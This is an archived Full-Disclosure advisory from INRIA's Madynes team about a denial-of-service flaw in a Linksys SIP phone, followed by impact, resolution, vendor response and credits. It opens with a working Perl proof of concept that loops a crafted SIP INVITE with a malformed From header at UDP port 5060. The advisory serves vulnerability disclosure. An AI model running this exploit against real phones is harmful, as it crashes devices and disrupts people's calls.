<p class=3DMsoNormal style=3D'text-autospace:none'><font size=3D2 =
face=3D"Courier New"><span
lang=3DEN-GB style=3D'font-size:10.0pt;font-family:"Courier =
New"'><o:p>&nbsp;</o:p></span></font></p>

<p class=3DMsoNormal style=3D'text-autospace:none'><font size=3D2 =
face=3D"Courier New"><span
lang=3DEN-GB style=3D'font-size:10.0pt;font-family:"Courier New"'>use =
IO::Socket;<o:p></o:p></span></font></p>

<p class=3DMsoNormal style=3D'text-autospace:none'><font size=3D2 =
face=3D"Courier New"><span
lang=3DEN-GB style=3D'font-size:10.0pt;font-family:"Courier =
New"'><o:p>&nbsp;</o:p></span></font></p>

<p class=3DMsoNormal style=3D'text-autospace:none'><font size=3D2 =
face=3D"Courier New"><span
lang=3DEN-GB style=3D'font-size:10.0pt;font-family:"Courier New"'>#die =
&quot;Usage
$0 &lt;username&gt; &lt;dst_IP&gt; &lt;Source_IP&gt; =
&lt;SourcePort&gt;&quot;
unless ($ARGV[</span></font><font size=3D2 face=3D"Courier New"><span =
lang=3DEN-US
style=3D'font-size:10.0pt;font-family:"Courier =
New"'>2]);<o:p></o:p></span></font></p>

<p class=3DMsoNormal style=3D'text-autospace:none'><font size=3D2 =
face=3D"Courier New"><span
lang=3DEN-GB style=3D'font-size:10.0pt;font-family:"Courier New"'>die =
&quot;Usage
$0 &lt;username&gt; &lt;dst_IP&gt; &lt;SourceIp&gt; =
&lt;sourceport&gt;&quot;
unless ($ARGV[0]);<o:p></o:p></span></font></p>

<p class=3DMsoNormal style=3D'text-autospace:none'><font size=3D2 =
face=3D"Courier New"><span
lang=3DEN-GB style=3D'font-size:10.0pt;font-family:"Courier =
New"'><o:p>&nbsp;</o:p></span></font></p>

<p class=3DMsoNormal style=3D'text-autospace:none'><font size=3D2 =
face=3D"Courier New"><span
lang=3DEN-GB style=3D'font-size:10.0pt;font-family:"Courier New"'>my =
$sock =3D new
IO::Socket::INET( LocalHost =3D&gt; $ARGV[2], LocalPort =3D&gt; =
$ARGV[3], Proto
=3D&gt; 'udp'); <o:p></o:p></span></font></p>

<p class=3DMsoNormal style=3D'text-autospace:none'><font size=3D2 =
face=3D"Courier New"><span
lang=3DEN-GB style=3D'font-size:10.0pt;font-family:"Courier =
New"'>$socket=3Dnew
IO::Socket::INET-&gt;new(PeerAddr=3D&gt;$ARGV[1], PeerPort=3D&gt; =
'5060', Proto=3D&gt;'udp',
LocalAddr=3D&gt;$ARGV[2], =
LocalPort=3D&gt;'5061');<o:p></o:p></span></font></p>

<p class=3DMsoNormal style=3D'text-autospace:none'><font size=3D2 =
face=3D"Courier New"><span
lang=3DEN-GB style=3D'font-size:10.0pt;font-family:"Courier =
New"'><o:p>&nbsp;</o:p></span></font></p>

<p class=3DMsoNormal style=3D'text-autospace:none'><font size=3D2 =
face=3D"Courier New"><span
lang=3DEN-GB style=3D'font-size:10.0pt;font-family:"Courier =
New"'>$touser=3D$ARGV[0];<o:p></o:p></span></font></p>

<p class=3DMsoNormal style=3D'text-autospace:none'><font size=3D2 =
face=3D"Courier New"><span
lang=3DEN-GB style=3D'font-size:10.0pt;font-family:"Courier =
New"'>$target=3D$ARGV[1];<o:p></o:p></span></font></p>

<p class=3DMsoNormal style=3D'text-autospace:none'><font size=3D2 =
face=3D"Courier New"><span
lang=3DEN-GB style=3D'font-size:10.0pt;font-family:"Courier =
New"'>$sourceaddress=3D$ARGV[2];<o:p></o:p></span></font></p>

<p class=3DMsoNormal style=3D'text-autospace:none'><font size=3D2 =
face=3D"Courier New"><span
lang=3DEN-GB style=3D'font-size:10.0pt;font-family:"Courier =
New"'>$sourceport=3D$ARGV[3];<o:p></o:p></span></font></p>

<p class=3DMsoNormal style=3D'text-autospace:none'><font size=3D2 =
face=3D"Courier New"><span
lang=3DEN-GB style=3D'font-size:10.0pt;font-family:"Courier =
New"'>$high=3D2000;<o:p></o:p></span></font></p>

<p class=3DMsoNormal style=3D'text-autospace:none'><font size=3D2 =
face=3D"Courier New"><span
lang=3DEN-GB style=3D'font-size:10.0pt;font-family:"Courier =
New"'>$low=3D1;<o:p></o:p></span></font></p>

<p class=3DMsoNormal style=3D'text-autospace:none'><font size=3D2 =
face=3D"Courier New"><span
lang=3DEN-GB style=3D'font-size:10.0pt;font-family:"Courier =
New"'>$fromuserid =3D
int(rand( $high-$low+1 ) ) + $low;<o:p></o:p></span></font></p>

<p class=3DMsoNormal style=3D'text-autospace:none'><font size=3D2 =
face=3D"Courier New"><span
lang=3DEN-GB style=3D'font-size:10.0pt;font-family:"Courier New"'>my =
$cseq =3D
&quot;INVITE&quot;;<o:p></o:p></span></font></p>

<p class=3DMsoNormal style=3D'text-autospace:none'><font size=3D2 =
face=3D"Courier New"><span
lang=3DEN-GB style=3D'font-size:10.0pt;font-family:"Courier =
New"'><o:p>&nbsp;</o:p></span></font></p>

<p class=3DMsoNormal style=3D'text-autospace:none'><font size=3D2 =
face=3D"Courier New"><span
lang=3DEN-GB style=3D'font-size:10.0pt;font-family:"Courier New"'>$msg =
=3D
&quot;INVITE sip:$touser\@$target SIP/2.0\r<o:p></o:p></span></font></p>

<p class=3DMsoNormal style=3D'text-autospace:none'><font size=3D2 =
face=3D"Courier New"><span
lang=3DEN-GB style=3D'font-size:10.0pt;font-family:"Courier New"'>Via: =
SIP/2.0/UDP
$sourceaddress:$sourceport;branch=3Dz9hG4bK00000\r<o:p></o:p></span></fon=
t></p>

<p class=3DMsoNormal style=3D'text-autospace:none'><font size=3D2 =
face=3D"Courier New"><span
lang=3DEN-GB style=3D'font-size:10.0pt;font-family:"Courier New"'>From:
\377&lt;sip:$fromuserid\@$sourceaddress&gt;;tag=3D779\r<o:p></o:p></span>=
</font></p>

<p class=3DMsoNormal style=3D'text-autospace:none'><font size=3D2 =
face=3D"Courier New"><span
lang=3DEN-GB style=3D'font-size:10.0pt;font-family:"Courier New"'>To: =
Receiver
&lt;sip:$touser\@$target&gt;\r<o:p></o:p></span></font></p>

<p class=3DMsoNormal style=3D'text-autospace:none'><font size=3D2 =
face=3D"Courier New"><span
lang=3DEN-GB style=3D'font-size:10.0pt;font-family:"Courier =
New"'>Call-ID:
10\@$sourceaddress\r<o:p></o:p></span></font></p>

<p class=3DMsoNormal style=3D'text-autospace:none'><font size=3D2 =
face=3D"Courier New"><span
lang=3DEN-GB style=3D'font-size:10.0pt;font-family:"Courier New"'>CSeq: =
1 $cseq\r<o:p></o:p></span></font></p>

<p class=3DMsoNormal style=3D'text-autospace:none'><font size=3D2 =
face=3D"Courier New"><span
lang=3DPT-BR style=3D'font-size:10.0pt;font-family:"Courier =
New"'>Contact: 779
&lt;sip:$fromuserid\@$sourceaddress&gt;\r<o:p></o:p></span></font></p>

<p class=3DMsoNormal style=3D'text-autospace:none'><font size=3D2 =
face=3D"Courier New"><span
lang=3DPT-BR style=3D'font-size:10.0pt;font-family:"Courier =
New"'>Expires: 1200\r<o:p></o:p></span></font></p>

<p class=3DMsoNormal style=3D'text-autospace:none'><font size=3D2 =
face=3D"Courier New"><span
lang=3DEN-GB style=3D'font-size:10.0pt;font-family:"Courier =
New"'>Max-Forwards:
70\r<o:p></o:p></span></font></p>

<p class=3DMsoNormal style=3D'text-autospace:none'><font size=3D2 =
face=3D"Courier New"><span
lang=3DEN-GB style=3D'font-size:10.0pt;font-family:"Courier =
New"'>Content-Type:
application/sdp\r<o:p></o:p></span></font></p>

<p class=3DMsoNormal style=3D'text-autospace:none'><font size=3D2 =
face=3D"Courier New"><span
lang=3DEN-GB style=3D'font-size:10.0pt;font-family:"Courier =
New"'>Content-Length:
133\r<o:p></o:p></span></font></p>

<p class=3DMsoNormal style=3D'text-autospace:none'><font size=3D2 =
face=3D"Courier New"><span
lang=3DEN-GB style=3D'font-size:10.0pt;font-family:"Courier =
New"'>\r<o:p></o:p></span></font></p>

<p class=3DMsoNormal style=3D'text-autospace:none'><font size=3D2 =
face=3D"Courier New"><span
lang=3DEN-GB style=3D'font-size:10.0pt;font-family:"Courier =
New"'>v=3D0\r<o:p></o:p></span></font></p>

<p class=3DMsoNormal style=3D'text-autospace:none'><font size=3D2 =
face=3D"Courier New"><span
lang=3DEN-GB style=3D'font-size:10.0pt;font-family:"Courier New"'>o=3D0 =
0 0 IN IP4
$sourceaddress\r<o:p></o:p></span></font></p>

<p class=3DMsoNormal style=3D'text-autospace:none'><font size=3D2 =
face=3D"Courier New"><span
lang=3DEN-GB style=3D'font-size:10.0pt;font-family:"Courier =
New"'>s=3DSession SDP\r<o:p></o:p></span></font></p>

<p class=3DMsoNormal style=3D'text-autospace:none'><font size=3D2 =
face=3D"Courier New"><span
lang=3DEN-GB style=3D'font-size:10.0pt;font-family:"Courier =
New"'>c=3DIN&nbsp; IP4
$sourceaddress\r<o:p></o:p></span></font></p>

<p class=3DMsoNormal style=3D'text-autospace:none'><font size=3D2 =
face=3D"Courier New"><span
lang=3DPT-BR style=3D'font-size:10.0pt;font-family:"Courier New"'>t=3D0 =
0\r<o:p></o:p></span></font></p>

<p class=3DMsoNormal style=3D'text-autospace:none'><font size=3D2 =
face=3D"Courier New"><span
lang=3DPT-BR style=3D'font-size:10.0pt;font-family:"Courier =
New"'>m=3Daudio 9876
RTP/AVP 0\r<o:p></o:p></span></font></p>

<p class=3DMsoNormal style=3D'text-autospace:none'><font size=3D2 =
face=3D"Courier New"><span
lang=3DEN-GB style=3D'font-size:10.0pt;font-family:"Courier =
New"'>a=3Drtpmap:0
PCMU/8000\r&quot;;<o:p></o:p></span></font></p>

<p class=3DMsoNormal style=3D'text-autospace:none'><font size=3D2 =
face=3D"Courier New"><span
lang=3DEN-GB style=3D'font-size:10.0pt;font-family:"Courier =
New"'><o:p>&nbsp;</o:p></span></font></p>

<p class=3DMsoNormal style=3D'text-autospace:none'><font size=3D2 =
face=3D"Courier New"><span
lang=3DEN-GB style=3D'font-size:10.0pt;font-family:"Courier New"'>$sock =
or die
&quot;no socket :$!&quot;;<o:p></o:p></span></font></p>

<p class=3DMsoNormal style=3D'text-autospace:none'><font size=3D2 =
face=3D"Courier New"><span
lang=3DEN-GB style=3D'font-size:10.0pt;font-family:"Courier New"'>while =
(1){<o:p></o:p></span></font></p>

<p class=3DMsoNormal style=3D'text-autospace:none'><font size=3D2 =
face=3D"Courier New"><span
lang=3DEN-GB style=3D'font-size:10.0pt;font-family:"Courier =
New"'>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; =
$socket-&gt;send($msg);<o:p></o:p></span></font></p>

<p class=3DMsoNormal style=3D'text-autospace:none'><font size=3D2 =
face=3D"Courier New"><span
lang=3DEN-GB style=3D'font-size:10.0pt;font-family:"Courier =
New"'>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; =
sleep
90;<o:p></o:p></span></font></p>

<p class=3DMsoNormal style=3D'text-autospace:none'><font size=3D2 =
face=3D"Courier New"><span
lang=3DEN-GB style=3D'font-size:10.0pt;font-family:"Courier =
New"'>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; =
</span></font><font
size=3D2 face=3D"Courier New"><span lang=3DEN-US =
style=3D'font-size:10.0pt;font-family:
"Courier New"'>}<o:p></o:p></span></font></p>

<p class=3DMsoNormal><font size=3D3 face=3D"Times New Roman"><span =
lang=3DEN-GB
style=3D'font-size:12.0pt'><o:p>&nbsp;</o:p></span></font></p>

<p class=3DMsoNormal><font size=3D3 face=3D"Times New Roman"><span =
lang=3DEN-US
style=3D'font-size:12.0pt'><o:p>&nbsp;</o:p></span></font></p>

<p class=3DMsoNormal><font size=3D3 face=3D"Times New Roman"><span =
lang=3DEN-US
style=3D'font-size:12.0pt'>Impact: <o:p></o:p></span></font></p>

<p class=3DMsoNormal><font size=3D3 face=3D"Times New Roman"><span =
lang=3DEN-US
style=3D'font-size:12.0pt'>A malicious user can remotely crash and =
perform a
denial of service attack by sending one crafted SIP&nbsp; =
&nbsp;messages. This is
conceptually similar to the &#8220;ping of death&#8221;. =
<o:p></o:p></span></font></p>

<p class=3DMsoNormal><font size=3D3 face=3D"Times New Roman"><span =
lang=3DEN-US
style=3D'font-size:12.0pt'><o:p>&nbsp;</o:p></span></font></p>

<p class=3DMsoNormal><font size=3D3 face=3D"Times New Roman"><span =
lang=3DEN-US
style=3D'font-size:12.0pt'>Resolution:<o:p></o:p></span></font></p>

<p class=3DMsoNormal><font size=3D3 face=3D"Times New Roman"><span =
lang=3DEN-US
style=3D'font-size:12.0pt'><o:p>&nbsp;</o:p></span></font></p>

<p class=3DMsoNormal><font size=3D3 face=3D"Times New Roman"><span =
lang=3DEN-US
style=3D'font-size:12.0pt'>Fixed software will be available and =
following
recommended best practices (ie segregating VOIP traffic from data) will =
be
protected from malicious traffic in most situations. =
<o:p></o:p></span></font></p>

<p class=3DMsoNormal style=3D'text-autospace:none'><font size=3D2 =
face=3D"Courier New"><span
lang=3DEN-US style=3D'font-size:10.0pt;font-family:"Courier =
New"'><o:p>&nbsp;</o:p></span></font></p>

<p class=3DMsoNormal =
style=3D'text-align:justify;text-autospace:none'><font size=3D3
face=3D"Times New Roman"><span lang=3DEN-US =
style=3D'font-size:12.0pt'>From Linksys response
we include the following resolution: This style of attack, limited to a =
single
end point and executed from behind a secure firewall, should not affect =
an
entire network and in most cases should easily be contained by the local
network management entity.&nbsp; Linksys will directly address this =
issue with a
future release of the phone firmware.<o:p></o:p></span></font></p>

<p class=3DMsoNormal><font size=3D3 face=3D"Times New Roman"><span =
lang=3DEN-US
style=3D'font-size:12.0pt'><o:p>&nbsp;</o:p></span></font></p>

<p class=3DMsoNormal><font size=3D3 face=3D"Times New Roman"><span =
lang=3DEN-US
style=3D'font-size:12.0pt'><o:p>&nbsp;</o:p></span></font></p>

<p class=3DMsoNormal><font size=3D3 face=3D"Times New Roman"><span =
lang=3DEN-US
style=3D'font-size:12.0pt'>Distribution: The advisory will be posted on =
the
following websites:<o:p></o:p></span></font></p>

<p class=3DMsoNormal style=3D'margin-left:.25in'><font size=3D3 =
face=3D"Times New Roman"><span
lang=3DEN-US =
style=3D'font-size:12.0pt'><o:p>&nbsp;</o:p></span></font></p>

<p class=3DMsoNormal><font size=3D3 face=3D"Times New Roman"><span =
lang=3DEN-US
style=3D'font-size:12.0pt'>madynes.loria.fr&nbsp; =
<o:p></o:p></span></font></p>

<p class=3DMsoNormal><font size=3D3 face=3D"Times New Roman"><span =
lang=3DEN-US
style=3D'font-size:12.0pt'><o:p>&nbsp;</o:p></span></font></p>

<p class=3DMsoNormal><font size=3D3 face=3D"Times New Roman"><span =
lang=3DEN-US
style=3D'font-size:12.0pt'>The advisory will be posted to the following =
mailing
lists<o:p></o:p></span></font></p>

<p class=3DMsoNormal><font size=3D3 face=3D"Times New Roman"><span =
lang=3DEN-US
style=3D'font-size:12.0pt'><o:p>&nbsp;</o:p></span></font></p>

<p class=3DMsoNormal><font size=3D3 face=3D"Times New Roman"><span =
style=3D'font-size:
12.0pt'>Voipsec&nbsp;: <a =
href=3D"mailto:voipsec@voipsa.org">voipsec@voipsa.org</a>.<o:p></o:p></sp=
an></font></p>

<p class=3DMsoNormal><font size=3D3 face=3D"Times New Roman"><span =
style=3D'font-size:
12.0pt'>fulldisclosure: <st1:PersonName =
w:st=3D"on">full-disclosure@lists.grok.org.uk</st1:PersonName><o:p></o:p>=
</span></font></p>

<p class=3DMsoNormal><font size=3D3 face=3D"Times New Roman"><span =
style=3D'font-size:
12.0pt'><o:p>&nbsp;</o:p></span></font></p>

<p class=3DMsoNormal><font size=3D3 face=3D"Times New Roman"><span =
style=3D'font-size:
12.0pt'><o:p>&nbsp;</o:p></span></font></p>

<p class=3DMsoNormal style=3D'text-autospace:ideograph-numeric'><font =
size=3D3
face=3D"Times New Roman"><span lang=3DEN-US =
style=3D'font-size:12.0pt'>Credits:<o:p></o:p></span></font></p>

<p class=3DMsoNormal style=3D'text-autospace:ideograph-numeric'><font =
size=3D3
face=3D"Times New Roman"><span lang=3DEN-US =
style=3D'font-size:12.0pt'><o:p>&nbsp;</o:p></span></font></p>

<p class=3DMsoNormal style=3D'text-autospace:ideograph-numeric'><font =
size=3D3
face=3D"Times New Roman"><span lang=3DEN-US =
style=3D'font-size:12.0pt'>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbs=
p;&nbsp;&nbsp;&nbsp; </span></font><span
lang=3DEN-US>Balamurugan Karpagavinayagam (Software =
engineer)</span><span
lang=3DEN-US><o:p></o:p></span></p>

<p class=3DMsoNormal style=3D'text-autospace:ideograph-numeric'><font =
size=3D3
face=3D"Times New Roman"><span lang=3DEN-US =
style=3D'font-size:12.0pt'>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbs=
p;&nbsp;&nbsp;&nbsp; Humberto
J. Abdelnur (Ph.D Student)<o:p></o:p></span></font></p>

<p class=3DMsoNormal style=3D'text-autospace:ideograph-numeric'><font =
size=3D3
face=3D"Times New Roman"><span lang=3DEN-US =
style=3D'font-size:12.0pt'>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbs=
p;&nbsp;&nbsp;&nbsp; <st1:place
w:st=3D"on"><st1:PlaceName w:st=3D"on">Radu</st1:PlaceName> =
<st1:PlaceType w:st=3D"on">State</st1:PlaceType></st1:place>
(Ph.D)<o:p></o:p></span></font></p>

<p class=3DMsoNormal style=3D'text-autospace:ideograph-numeric'><font =
size=3D3
face=3D"Times New Roman"><span lang=3DEN-US =
style=3D'font-size:12.0pt'>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbs=
p;&nbsp;&nbsp;&nbsp; Olivier
Festor (Ph.D)<o:p></o:p></span></font></p>

<p class=3DMsoNormal style=3D'text-autospace:ideograph-numeric'><font =
size=3D3
face=3D"Times New Roman"><span lang=3DEN-US =
style=3D'font-size:12.0pt'><o:p>&nbsp;</o:p></span></font></p>

<p class=3DMsoNormal style=3D'text-autospace:ideograph-numeric'><font =
size=3D3
face=3D"Times New Roman"><span lang=3DEN-US =
style=3D'font-size:12.0pt'>This
vulnerability was identified by the Madynes research team at INRIA =
Lorraine,
using the Madynes VoIP fuzzer.<o:p></o:p></span></font></p>

<p class=3DMsoNormal><font size=3D3 face=3D"Times New Roman"><span =
lang=3DEN-US
style=3D'font-size:12.0pt'><o:p>&nbsp;</o:p></span></font></p>

<p class=3DMsoNormal><font size=3D3 face=3D"Times New Roman"><span =
lang=3DEN-US
style=3D'font-size:12.0pt'><o:p>&nbsp;</o:p></span></font></p>

<p class=3DMsoNormal><b><font size=3D2 face=3DArial><span lang=3DEN-US
style=3D'font-size:10.0pt;font-family:Arial;font-weight:bold'><o:p>&nbsp;=
</o:p></span></font></b></p>

<p class=3DMsoNormal style=3D'text-autospace:ideograph-numeric'><b><font =
size=3D2
face=3D"Courier New"><span lang=3DEN-US =
style=3D'font-size:10.0pt;font-family:"Courier New";
font-weight:bold'>Information about us: Madynes is a research team at =
INRIA <st1:place
w:st=3D"on"><st1:State w:st=3D"on">Lorraine</st1:State></st1:place> =
working on VoIP
Security assessment, intrusion detection and =
prevention.<o:p></o:p></span></font></b></p>

<p class=3DMsoNormal><font size=3D3 face=3D"Times New Roman"><span =
lang=3DEN-US
style=3D'font-size:12.0pt'><o:p>&nbsp;</o:p></span></font></p>

<p class=3DMsoNormal><font size=3D3 face=3D"Times New Roman"><span =
lang=3DEN-US
style=3D'font-size:12.0pt'><o:p>&nbsp;</o:p></span></font></p>

<p class=3DMsoNormal><font size=3D2 face=3DArial><span lang=3DEN-US =
style=3D'font-size:
10.0pt;font-family:Arial'><o:p>&nbsp;</o:p></span></font></p>

</div>

</body>

</html>

------=_NextPart_000_015F_01C7867D.A975EBA0--


--===============1338559389==
Content-Type: text/plain; charset="us-ascii"
MIME-Version: 1.0
Content-Transfer-Encoding: 7bit
Content-Disposition: inline

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
--===============1338559389==--


Go to the Top of This SecurityTracker Archive Page



Home   |    View Topics   |    Search   |    Contact Us

Copyright 2013, SecurityGlobal.net LLC